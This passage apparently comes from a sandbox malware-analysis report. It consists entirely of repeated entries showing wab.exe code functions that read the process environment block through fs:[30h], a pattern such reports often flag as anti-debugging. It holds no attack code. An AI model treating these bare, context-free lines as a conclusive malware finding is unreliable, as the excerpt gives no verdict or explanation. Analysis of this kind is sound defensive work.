Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337330C mov eax, dword ptr fs:[00000030h] 12_2_2337330C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337330C mov eax, dword ptr fs:[00000030h] 12_2_2337330C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h] 12_2_2336E372
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h] 12_2_2336E372
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h] 12_2_2336E372
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h] 12_2_2336E372
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23370371 mov eax, dword ptr fs:[00000030h] 12_2_23370371
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23370371 mov eax, dword ptr fs:[00000030h] 12_2_23370371
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331237A mov eax, dword ptr fs:[00000030h] 12_2_2331237A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E8347 mov eax, dword ptr fs:[00000030h] 12_2_232E8347
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E8347 mov eax, dword ptr fs:[00000030h] 12_2_232E8347
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E8347 mov eax, dword ptr fs:[00000030h] 12_2_232E8347
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336C3B0 mov eax, dword ptr fs:[00000030h] 12_2_2336C3B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F93A6 mov eax, dword ptr fs:[00000030h] 12_2_232F93A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F93A6 mov eax, dword ptr fs:[00000030h] 12_2_232F93A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331A390 mov eax, dword ptr fs:[00000030h] 12_2_2331A390
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331A390 mov eax, dword ptr fs:[00000030h] 12_2_2331A390
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331A390 mov eax, dword ptr fs:[00000030h] 12_2_2331A390
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h] 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h] 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h] 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h] 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h] 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF38A mov eax, dword ptr fs:[00000030h] 12_2_233AF38A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233233D0 mov eax, dword ptr fs:[00000030h] 12_2_233233D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233743D5 mov eax, dword ptr fs:[00000030h] 12_2_233743D5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233243D0 mov ecx, dword ptr fs:[00000030h] 12_2_233243D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F63CB mov eax, dword ptr fs:[00000030h] 12_2_232F63CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EC3C7 mov eax, dword ptr fs:[00000030h] 12_2_232EC3C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE3C0 mov eax, dword ptr fs:[00000030h] 12_2_232EE3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE3C0 mov eax, dword ptr fs:[00000030h] 12_2_232EE3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE3C0 mov eax, dword ptr fs:[00000030h] 12_2_232EE3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23310230 mov ecx, dword ptr fs:[00000030h] 12_2_23310230
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23370227 mov eax, dword ptr fs:[00000030h] 12_2_23370227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23370227 mov eax, dword ptr fs:[00000030h] 12_2_23370227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23370227 mov eax, dword ptr fs:[00000030h] 12_2_23370227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A22B mov eax, dword ptr fs:[00000030h] 12_2_2332A22B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A22B mov eax, dword ptr fs:[00000030h] 12_2_2332A22B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A22B mov eax, dword ptr fs:[00000030h] 12_2_2332A22B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337B214 mov eax, dword ptr fs:[00000030h] 12_2_2337B214
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337B214 mov eax, dword ptr fs:[00000030h] 12_2_2337B214
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EA200 mov eax, dword ptr fs:[00000030h] 12_2_232EA200
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E821B mov eax, dword ptr fs:[00000030h] 12_2_232E821B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AD270 mov eax, dword ptr fs:[00000030h] 12_2_233AD270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB273 mov eax, dword ptr fs:[00000030h] 12_2_232EB273
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB273 mov eax, dword ptr fs:[00000030h] 12_2_232EB273
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB273 mov eax, dword ptr fs:[00000030h] 12_2_232EB273
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331F24A mov eax, dword ptr fs:[00000030h] 12_2_2331F24A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF247 mov eax, dword ptr fs:[00000030h] 12_2_233AF247
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h] 12_2_233CB2BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h] 12_2_233CB2BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h] 12_2_233CB2BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h] 12_2_233CB2BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E92AF mov eax, dword ptr fs:[00000030h] 12_2_232E92AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B92AB mov eax, dword ptr fs:[00000030h] 12_2_233B92AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF2AE mov eax, dword ptr fs:[00000030h] 12_2_233AF2AE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233142AF mov eax, dword ptr fs:[00000030h] 12_2_233142AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233142AF mov eax, dword ptr fs:[00000030h] 12_2_233142AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EC2B0 mov ecx, dword ptr fs:[00000030h] 12_2_232EC2B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E289 mov eax, dword ptr fs:[00000030h] 12_2_2336E289
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F7290 mov eax, dword ptr fs:[00000030h] 12_2_232F7290
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F7290 mov eax, dword ptr fs:[00000030h] 12_2_232F7290
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F7290 mov eax, dword ptr fs:[00000030h] 12_2_232F7290
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED2EC mov eax, dword ptr fs:[00000030h] 12_2_232ED2EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED2EC mov eax, dword ptr fs:[00000030h] 12_2_232ED2EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E72E0 mov eax, dword ptr fs:[00000030h] 12_2_232E72E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h] 12_2_232F82E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h] 12_2_232F82E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h] 12_2_232F82E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h] 12_2_232F82E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233132C5 mov eax, dword ptr fs:[00000030h] 12_2_233132C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C32C9 mov eax, dword ptr fs:[00000030h] 12_2_233C32C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF13E mov eax, dword ptr fs:[00000030h] 12_2_233AF13E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23327128 mov eax, dword ptr fs:[00000030h] 12_2_23327128
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23327128 mov eax, dword ptr fs:[00000030h] 12_2_23327128
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F510D mov eax, dword ptr fs:[00000030h] 12_2_232F510D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23320118 mov eax, dword ptr fs:[00000030h] 12_2_23320118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2334717A mov eax, dword ptr fs:[00000030h] 12_2_2334717A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2334717A mov eax, dword ptr fs:[00000030h] 12_2_2334717A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F6179 mov eax, dword ptr fs:[00000030h] 12_2_232F6179
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332716D mov eax, dword ptr fs:[00000030h] 12_2_2332716D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EA147 mov eax, dword ptr fs:[00000030h] 12_2_232EA147
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EA147 mov eax, dword ptr fs:[00000030h] 12_2_232EA147
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EA147 mov eax, dword ptr fs:[00000030h] 12_2_232EA147
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C3157 mov eax, dword ptr fs:[00000030h] 12_2_233C3157
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C3157 mov eax, dword ptr fs:[00000030h] 12_2_233C3157
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C3157 mov eax, dword ptr fs:[00000030h] 12_2_233C3157
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332415F mov eax, dword ptr fs:[00000030h] 12_2_2332415F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338314A mov eax, dword ptr fs:[00000030h] 12_2_2338314A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338314A mov eax, dword ptr fs:[00000030h] 12_2_2338314A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338314A mov eax, dword ptr fs:[00000030h] 12_2_2338314A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338314A mov eax, dword ptr fs:[00000030h] 12_2_2338314A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C5149 mov eax, dword ptr fs:[00000030h] 12_2_233C5149
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233241BB mov ecx, dword ptr fs:[00000030h] 12_2_233241BB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233241BB mov eax, dword ptr fs:[00000030h] 12_2_233241BB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233241BB mov eax, dword ptr fs:[00000030h] 12_2_233241BB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C51B6 mov eax, dword ptr fs:[00000030h] 12_2_233C51B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233231BE mov eax, dword ptr fs:[00000030h] 12_2_233231BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233231BE mov eax, dword ptr fs:[00000030h] 12_2_233231BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E1A4 mov eax, dword ptr fs:[00000030h] 12_2_2332E1A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E1A4 mov eax, dword ptr fs:[00000030h] 12_2_2332E1A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331190 mov eax, dword ptr fs:[00000030h] 12_2_23331190
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331190 mov eax, dword ptr fs:[00000030h] 12_2_23331190
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23319194 mov eax, dword ptr fs:[00000030h] 12_2_23319194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F4180 mov eax, dword ptr fs:[00000030h] 12_2_232F4180
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F4180 mov eax, dword ptr fs:[00000030h] 12_2_232F4180
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F4180 mov eax, dword ptr fs:[00000030h] 12_2_232F4180
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233001F1 mov eax, dword ptr fs:[00000030h] 12_2_233001F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233001F1 mov eax, dword ptr fs:[00000030h] 12_2_233001F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233001F1 mov eax, dword ptr fs:[00000030h] 12_2_233001F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331F1F0 mov eax, dword ptr fs:[00000030h] 12_2_2331F1F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331F1F0 mov eax, dword ptr fs:[00000030h] 12_2_2331F1F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E81EB mov eax, dword ptr fs:[00000030h] 12_2_232E81EB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F91E5 mov eax, dword ptr fs:[00000030h] 12_2_232F91E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F91E5 mov eax, dword ptr fs:[00000030h] 12_2_232F91E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h] 12_2_232FA1E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h] 12_2_232FA1E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h] 12_2_232FA1E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h] 12_2_232FA1E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h] 12_2_232FA1E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B81EE mov eax, dword ptr fs:[00000030h] 12_2_233B81EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B81EE mov eax, dword ptr fs:[00000030h] 12_2_233B81EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E91F0 mov eax, dword ptr fs:[00000030h] 12_2_232E91F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E91F0 mov eax, dword ptr fs:[00000030h] 12_2_232E91F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233001C0 mov eax, dword ptr fs:[00000030h] 12_2_233001C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233001C0 mov eax, dword ptr fs:[00000030h] 12_2_233001C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h] 12_2_233051C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h] 12_2_233051C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h] 12_2_233051C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233051C0 mov eax, dword ptr fs:[00000030h] 12_2_233051C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED02D mov eax, dword ptr fs:[00000030h] 12_2_232ED02D
